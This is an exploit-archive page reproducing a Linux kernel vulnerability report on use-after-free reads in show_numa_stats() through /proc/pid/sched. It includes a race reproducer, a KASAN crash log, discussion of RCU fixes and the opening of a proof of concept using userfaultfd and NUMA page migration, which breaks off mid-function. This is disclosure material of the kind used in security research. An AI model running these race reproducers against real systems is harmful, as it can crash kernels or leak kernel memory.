Linux use-after-free reads in show_numa_stats() Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2019-08-12 | Type : dos | Platform : linux
This exploit / vulnerability, Linux use-after-free reads in show_numa_stats(), is for educational purposes only; if you use it, you do so at your own risk!
[+] Code ...
/*
On NUMA systems, the Linux fair scheduler tracks information related to NUMA
faults in task_struct::numa_faults and task_struct::numa_group. Both of these
have broken object lifetimes.
Since commit 82727018b0d3 ("sched/numa: Call task_numa_free() from do_execve()",
first in v3.13), ->numa_faults is freed not only when the last reference to the
task_struct is gone, but also after successful execve(). However,
show_numa_stats() (reachable through /proc/$pid/sched) locklessly reads data
from ->numa_faults (use-after-free read) and prints it to a userspace buffer.
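In its simplest form, the race looks something like the sketch below (placeholder
names, /bin/true as an arbitrary execve() target; the window is tiny, so this alone
is not a reliable reproducer, and the full PoC at the end additionally sets up
userfaultfd and cross-node page migration):

  // sketch: race a /proc/<pid>/sched reader against the target's execve()
  // build: gcc -o sched_race sched_race.c
  #include <err.h>
  #include <fcntl.h>
  #include <stdio.h>
  #include <sys/wait.h>
  #include <unistd.h>

  int main(void) {
    pid_t pid = fork();
    if (pid == -1) err(1, "fork");
    if (pid == 0) {
      // target: touch memory for a while so NUMA balancing gets a chance to
      // allocate and populate ->numa_faults, then execve(), which calls
      // task_numa_free() and kfree()s the old ->numa_faults allocation
      static volatile char arr[1 << 20];
      for (long i = 0; i < 200000000; i++)
        arr[i % sizeof(arr)]++;
      char *args[] = { "/bin/true", NULL };
      execve("/bin/true", args, NULL);
      _exit(1);
    }
    char path[64];
    snprintf(path, sizeof(path), "/proc/%d/sched", pid);
    int fd = open(path, O_RDONLY);
    if (fd == -1) err(1, "open");
    // reader: each pread() regenerates the sched file, which on
    // CONFIG_NUMA_BALANCING kernels goes through show_numa_stats()
    char buf[0x1000];
    while (waitpid(pid, NULL, WNOHANG) == 0) {
      if (pread(fd, buf, sizeof(buf) - 1, 0) < 0)
        break;
    }
    close(fd);
    return 0;
  }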
To test this, I used a QEMU VM configured with multiple NUMA nodes (including a
CPU-less one). With KASAN enabled, the use-after-free read shows up as follows:
[ 909.490121] The buggy address belongs to the object at ffff8880ac8f8f00
which belongs to the cache kmalloc-128 of size 128
[ 909.491564] The buggy address is located 0 bytes inside of
128-byte region [ffff8880ac8f8f00, ffff8880ac8f8f80)
[ 909.492919] The buggy address belongs to the page:
[ 909.493445] page:ffffea0002b23e00 refcount:1 mapcount:0 mapping:ffff8880b7003500 index:0xffff8880ac8f8d80
[ 909.494419] flags: 0x1fffc0000000200(slab)
[ 909.494836] raw: 01fffc0000000200 ffffea0002cec780 0000000900000009 ffff8880b7003500
[ 909.495633] raw: ffff8880ac8f8d80 0000000080150011 00000001ffffffff 0000000000000000
[ 909.496451] page dumped because: kasan: bad access detected
[ 909.497291] Memory state around the buggy address:
[ 909.497775] ffff8880ac8f8e00: fc fc fc fc fc fc fc fc fb fb fb fb fb fb fb fb
[ 909.498546] ffff8880ac8f8e80: fb fb fb fb fb fb fb fb fc fc fc fc fc fc fc fc
[ 909.499319] >ffff8880ac8f8f00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 909.500034] ^
[ 909.500429] ffff8880ac8f8f80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 909.501150] ffff8880ac8f9000: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
[ 909.501942] ==================================================================
[ 909.502712] Disabling lock debugging due to kernel taint
============================
->numa_group is a refcounted reference with RCU semantics, but the RCU helpers
are used inconsistently. In particular, show_numa_stats() reads from
p->numa_group->faults with no protection against concurrent updates.
There are also various other places across the scheduler that use ->numa_group
without proper protection; e.g. as far as I can tell,
sched_tick_remote()->task_tick_fair()->task_tick_numa()->task_scan_start()
reads from p->numa_group protected only by the implicit read-side critical
section that spinlocks currently imply by disabling preemption, and with no
protection against the pointer unexpectedly becoming NULL.
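To make that concrete, the reading side currently looks roughly like the first
pattern below; consistent RCU usage would look like the second (just a sketch with
made-up locals, not the actual patch):

  // current pattern: plain load of p->numa_group, nothing prevents the group
  // from being freed between the NULL check and the array read
  struct numa_group *ng = p->numa_group;
  unsigned long f = 0;
  if (ng)
    f = ng->faults[i];

  // consistent RCU usage: ->numa_group annotated __rcu, reads done inside an
  // explicit read-side critical section via rcu_dereference(), so the group
  // cannot be freed out from under the reader before rcu_read_unlock()
  rcu_read_lock();
  ng = rcu_dereference(p->numa_group);
  if (ng)
    f = ng->faults[i];
  rcu_read_unlock();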
I am going to send suggested fixes in a minute, but I think the approach for
->numa_group might be a bit controversial. The approach I'm taking is:
- For ->numa_faults, just wipe the statistics instead of freeing them.
- For ->numa_group, use proper RCU accessors everywhere.
Annoyingly, if one of the RCU accessors detects a problem (with
CONFIG_PROVE_LOCKING=y), it uses printk, and if the wrong runqueue lock is held
at that point, a deadlock might happen, which isn't great. To avoid that, the
second patch adds an ugly hack in printk that detects potential runqueue
deadlocks if lockdep is on. I'm not sure how you all are going to feel about
that one - maybe it's better to just leave it out, or do something different
there? I don't know...
I'm sending the suggested patches off-list for now; if you want me to resend
them publicly, just say so.
*/
#include <err.h>
#include <errno.h>
#include <fcntl.h>
#include <numaif.h>             /* migrate_pages(); link with -lnuma */
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <linux/userfaultfd.h>

static int sched_fd;            /* fd for /proc/self/sched, opened in main() */
volatile int uaf_child_ready = 0;
// reader: keep re-reading the sched proc file; each read goes through
// show_numa_stats() and touches ->numa_faults
static int sfd_uaf(void *fd_) {
  int fd = (int)(long)fd_;
  /*
  prctl(PR_SET_PDEATHSIG, SIGKILL);
  if (getppid() == 1) raise(SIGKILL);
  */
  while (1) {
    char buf[0x1000];
    ssize_t res = pread(fd, buf, sizeof(buf)-1, 0);
    if (res == -1) {
      if (errno == ESRCH) _exit(0); // target task is gone
      err(1, "pread");
    }
    buf[res] = '\0';
    puts(buf);
    uaf_child_ready = 1;
  }
}
int main(int argc, char **argv) {
  if (strcmp(argv[0], "die") == 0) {
    _exit(0);
  }
  sched_fd = open("/proc/self/sched", O_RDONLY|O_CLOEXEC);
  if (sched_fd == -1) err(1, "open sched");

  // allocate two pages at the lowest possible virtual address so that the
  // first periodic memory fault is scheduled on the first page
  char *page = mmap((void*)0x1000, 0x2000, PROT_READ|PROT_WRITE,
                    MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
  if (page == MAP_FAILED) err(1, "mmap");
  *page = 'a';

  // handle the second page with uffd
  int ufd = syscall(__NR_userfaultfd, 0);
  if (ufd == -1) err(1, "userfaultfd");
  struct uffdio_api api = { .api = UFFD_API, .features = 0 };
  if (ioctl(ufd, UFFDIO_API, &api)) err(1, "uffdio_api");
  struct uffdio_register reg = {
    .mode = UFFDIO_REGISTER_MODE_MISSING,
    .range = { .start = (__u64)page+0x1000, .len = 0x1000 }
  };
  if (ioctl(ufd, UFFDIO_REGISTER, &reg))
    err(1, "uffdio_register");

  // make sure that the page is on the CPU-less NUMA node
  unsigned long old_nodes = 0x1;
  unsigned long new_nodes = 0x2;
  if (migrate_pages(0, sizeof(unsigned long), &old_nodes, &new_nodes))
    err(1, "migrate_pages");